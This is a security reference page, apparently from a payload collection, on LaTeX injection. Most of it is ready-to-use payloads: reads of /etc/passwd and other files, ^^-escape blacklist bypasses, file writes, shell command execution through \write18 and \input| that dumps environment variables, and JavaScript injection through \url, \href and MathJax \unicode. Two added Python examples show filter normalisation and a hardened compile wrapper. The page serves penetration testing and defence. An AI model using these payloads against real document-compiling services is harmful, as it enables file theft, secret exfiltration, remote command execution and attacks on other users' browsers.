# LaTeX Injection

LaTeX injection occurs when user-controlled text is compiled by a TeX engine (pdflatex, xelatex, lualatex) or rendered by a LaTeX-to-HTML component such as MathJax. TeX is a full macro language with file and process primitives, so the impact ranges from local file read to command execution on the compiling host.

You might need to adjust the injection with wrappers such as `\[` or `$`, depending on whether the injection point sits in text mode or math mode.

## Read file

Read a file and interpret the LaTeX code in it (the content is tokenised, so `\`, `$`, `#`, `&`, `_` and other special characters in the file raise errors; see the `\catcode` trick and `\verbatiminput` below):

```tex
\input{/etc/passwd}
\include{somefile} % loads somefile.tex; only valid in the document body, not in the preamble
```

Read a single-line file (`\text` needs `amsmath` or a math-mode injection point; in text mode, `\line` on its own prints the content):

```tex
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```

Read a multi-line file, either with the `listings` package (`\lstinputlisting` requires `\usepackage{listings}` in the preamble and reads the file verbatim) or with a read loop (needs only e-TeX's `\unless`, available in every modern engine, but each line is tokenised, so special characters in the file break the compile):

```tex
\lstinputlisting{/etc/passwd}
```

```tex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```

Read a text file **without** interpreting the content; it only pastes the raw file content (requires the `verbatim` package, so the injection point must be in the preamble or the package must already be loaded):

```tex
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```

If the injection point is past the document header (`\usepackage` cannot be used), some special characters can be deactivated by giving them catcode 12 ("other"), so that `\input` works on a file containing `$`, `#`, `_`, `&`, null bytes, ... (e.g. Perl scripts). `\`, `{`, `}` and `%` keep their meaning, so a file using those may still fail:

```tex
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{path_to_script.pl}
```

To bypass a blacklist, try replacing one character of a control sequence with its TeX `^^xx` hex form (two lowercase hex digits of the character's ASCII code). The substitution happens when TeX reads the input line, before tokenisation, so the engine still sees the original command name while a substring filter does not:

- `^^41` represents a capital `A`
- `^^7e` represents a tilde (`~`); note that the `e` must be lowercase, since `^^7E` is read as `^^7` (the character `w`) followed by `E`

```tex
\lstin^^70utlisting{/etc/passwd}
```
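
The following Python helper is an added example, not code from the original page: it mimics how TeX's input reader resolves `^^` escapes and shows why a substring blacklist of dangerous control sequences must normalise its input first. The blacklist, the sample payloads and the function names are assumptions made for the demo.

```python
import re

# Assumed, hypothetical denylist of the kind a naive LaTeX "sanitizer" might use.
# Control words only: \write18 is seen by TeX as \write followed by the number 18.
BLACKLIST = frozenset({
    r"\input", r"\include", r"\write", r"\read", r"\openin", r"\openout",
    r"\newread", r"\newwrite", r"\catcode", r"\lstinputlisting", r"\verbatiminput",
})

_HEX = "0123456789abcdef"            # TeX only accepts lowercase hex digits after ^^
_CONTROL_SEQ = re.compile(r"\\([A-Za-z]+|.)")


def tex_hex_escape(char: str) -> str:
    """Encode one 7-bit character as TeX's ^^xx form, e.g. 'A' -> '^^41'."""
    code = ord(char)
    if code > 0x7F:
        raise ValueError("^^xx only covers character codes 0x00-0x7f")
    return "^^" + _HEX[code >> 4] + _HEX[code & 0xF]


def obfuscate(command: str, index: int) -> str:
    """Attacker side: replace the character at `index` with its ^^xx form."""
    return command[:index] + tex_hex_escape(command[index]) + command[index + 1:]


def tex_unescape(line: str) -> str:
    """Defender side: resolve ^^ escapes the way TeX's input reader does.

    ^^xy with two lowercase hex digits is the character with that code; ^^c with
    any other following character c is c XOR 64 (so ^^7E becomes 'w' then 'E').
    The replacement is rescanned at the same position, as TeX does.
    """
    i = 0
    while i + 2 < len(line):
        if line[i] == "^" and line[i + 1] == "^":
            if i + 3 < len(line) and line[i + 2] in _HEX and line[i + 3] in _HEX:
                repl, width = chr(int(line[i + 2:i + 4], 16)), 4
            else:
                repl, width = chr(ord(line[i + 2]) ^ 0x40), 3
            line = line[:i] + repl + line[i + width:]
            continue
        i += 1
    return line


def naive_blacklist_hit(snippet: str) -> bool:
    """Substring match on the raw input: this is what ^^ obfuscation bypasses."""
    return any(bad in snippet for bad in BLACKLIST)


def dangerous_control_sequences(snippet: str) -> list:
    """Control sequences from BLACKLIST that are present after ^^ normalisation."""
    normalised = tex_unescape(snippet)
    return [m.group(0) for m in _CONTROL_SEQ.finditer(normalised)
            if m.group(0) in BLACKLIST]


if __name__ == "__main__":
    # Constructed sample payloads for the demo.
    for payload in (
        obfuscate(r"\lstinputlisting", 6) + "{/etc/passwd}",  # the page's example
        r"\immediate\write^^31^^38{id > output}",             # \write18 with hex digits
        "^^5cinput{/etc/passwd}",                             # even the backslash itself
    ):
        print(f"{payload!r}: naive={naive_blacklist_hit(payload)} "
              f"normalised={dangerous_control_sequences(payload)}")
```

The third payload is the point of the exercise: every byte of a control sequence, the backslash included, can be spelled as `^^xx`, so a filter that inspects the raw text can always be evaded. Normalising first (or, better, not compiling untrusted input with file and shell primitives available at all) is the only reliable option.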

## Write file

Write a file, one `\write` per line (`\openout` and `\write` are deferred until the page is shipped out; prefix them with `\immediate` to write at once, which also works when the document never produces a page):

```tex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
```

The file is created relative to the engine's working directory and is subject to the `openout_any` setting (TeX Live defaults to `p`, paranoid, which rejects absolute paths and `..`).

## Command execution

`\write18` hands its argument to the system shell, but only when the engine runs with shell escape enabled (`--shell-escape`, or `shell_escape = t` in `texmf.cnf`; the default restricted mode only allows a whitelist of programs). The command's output goes to the TeX process's stdout, not into the document, so redirect it to a temp file and read that back:

```tex
\immediate\write18{id > output}
\input{output}
```

If you get a LaTeX error because the output contains special characters, base64-encode it (or read it with `\verbatiminput`); base64 output only uses characters TeX treats as ordinary:

```tex
\immediate\write18{env | base64 > test.tex}
\input{test.tex}
```

With shell escape enabled, `\input` also accepts a pipe: a filename starting with `|` is executed and its stdout is read as the input file, so no temp file is needed:

```tex
\input|ls|base64
\input{|"/bin/hostname"}
```
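
On the defensive side, the following Python wrapper (an added example, not code from the original page) shows the engine-level controls that neutralise the primitives above when a service must compile untrusted LaTeX: shell escape off, Kpathsea's paranoid file-access mode, a throw-away working directory and a timeout. The engine location, the `PATH` value and the function names are assumptions; `shell_escape`, `openin_any` and `openout_any` are real `texmf.cnf` variables that TeX Live also reads from the environment.

```python
import os
import shutil
import subprocess
import tempfile


def hardened_env(workdir: str, engine_dir: str = "/usr/bin") -> dict:
    """Minimal environment for a TeX engine compiling untrusted input.

    The lowercase variables are Kpathsea (texmf.cnf) settings; TeX Live lets the
    environment override the config file, so they are enforced per process.
    """
    return {
        "PATH": f"{engine_dir}:/usr/bin:/bin",  # assumption; do not inherit the caller's PATH
        "HOME": workdir,          # keeps the engine away from the real ~/texmf, ~/.latexmkrc etc.
        "TEXMFOUTPUT": workdir,   # the only tree absolute paths may point into
        "shell_escape": "f",      # \write18 and \input| disabled outright (not "restricted")
        "openin_any": "p",        # paranoid: no dotfiles, no "..", no absolute paths elsewhere
        "openout_any": "p",       # same restriction for \openout / \write targets
    }


def build_compile_command(tex_path: str, engine: str = "pdflatex") -> list:
    """argv for one compile run; the CLI flag duplicates shell_escape=f on purpose."""
    return [
        engine,
        "-no-shell-escape",
        "-interaction=batchmode",  # never wait on the terminal for a missing file
        "-halt-on-error",
        os.path.basename(tex_path),
    ]


def compile_untrusted(tex_source: str, timeout: float = 30.0):
    """Compile `tex_source` in a throw-away directory.

    Returns (returncode, log), (None, "timeout"), or None when no pdflatex binary
    is available (assumption: the caller treats that as a failure).
    """
    engine = shutil.which("pdflatex")
    if engine is None:
        return None
    with tempfile.TemporaryDirectory(prefix="texjob-") as workdir:
        tex_path = os.path.join(workdir, "main.tex")
        with open(tex_path, "w", encoding="utf-8") as fh:
            fh.write(tex_source)
        try:
            proc = subprocess.run(
                build_compile_command(tex_path, engine),
                cwd=workdir,
                env=hardened_env(workdir, os.path.dirname(engine)),
                stdin=subprocess.DEVNULL,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                timeout=timeout,    # \loop ... \repeat and friends can spin forever
                check=False,
            )
        except subprocess.TimeoutExpired:
            return (None, "timeout")
        log_path = os.path.join(workdir, "main.log")
        if os.path.exists(log_path):
            with open(log_path, encoding="utf-8", errors="replace") as fh:
                return (proc.returncode, fh.read())
        return (proc.returncode, proc.stdout.decode("utf-8", errors="replace"))


if __name__ == "__main__":
    # Constructed probe: with the settings above `id` is never executed and the
    # absolute-path \input is refused, so the run must end with a non-zero rc.
    probe = (r"\documentclass{article}\begin{document}"
             r"\immediate\write18{id > output}\input{/etc/passwd}\end{document}")
    result = compile_untrusted(probe)
    print("pdflatex not installed" if result is None else f"rc={result[0]}")
```

These settings stop `\write18`, `\input|`, `\openin`/`\input` on paths outside the job directory and `\openout` elsewhere; they do not stop CPU or disk exhaustion beyond the timeout, so in production the engine should additionally run inside a container or seccomp/ulimit sandbox with no network.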

## Cross Site Scripting

When the LaTeX is rendered to HTML rather than PDF, `\url` and `\href` become links, and a `javascript:` scheme in them executes in the viewer's browser. From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130):

```tex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```

In [MathJax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.html), via the `unicode` extension:

```tex
\unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">}
```

## References

* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)